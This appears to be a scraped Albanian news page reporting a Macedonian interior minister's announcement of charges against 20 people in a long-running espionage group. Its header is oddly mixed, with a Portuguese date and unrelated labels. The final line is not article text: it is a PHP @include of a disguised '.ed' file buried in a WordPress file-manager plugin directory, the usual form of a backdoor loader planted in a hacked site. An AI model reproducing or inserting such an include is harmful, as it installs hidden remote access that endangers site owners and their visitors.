Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

Jankulloska: Grupi i spiunazhit ka vepruar që nga viti 2005

Jankulloska: Grupi i spiunazhit ka vepruar që nga viti 2005

Policia ka ngritur padi penale kundër 20 personave për spiunazh, shoqërim penal, keqpërdorim të autoritetit dhe pushtetit, shantazhe dhe kërcënim.

jankullovska

Në konferencën për shtyp e cila përfundoi më parë, Ministrja e punëve të brendshme, Gordana Jankulloska, zbuloi se grupi i organizuar ka filluar me punën që nga viti 2005, kur i dyshuari i parë Marjan Efremov, është shkarkuar nga Agjencia e zbulimit dhe ka vendosur ta formojë shoqërinë penale.

Ai është shoqëruar me të dyshuarin e dytë dhe të tretë të cilët janë të punësuar në Agjencinë e zbulimit dhe me dy të tjerë që punojnë në institucionet shtetërore kanë filluar me aktivitetet kriminale kundër shtetit.

“Pesë prej tyre kanë punuar për shërbimet e huaja të zbulimit, kanë mbledhur informacione në mënyrë ilegale dhe i kanë shitur, që kanë të bëjnë me institucionet e sigurimit, gjendjen politike në vend, zgjedhjet, rreziqe të caktuara, emra të personale të cilët kanë udhëhequr procese të caktuara, detale për ato persona, informacione të klasifikimit për institucionet fetare dhe strukturat e tyre radikale”, deklaroi ministrja, Gordana Jankulloska.

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";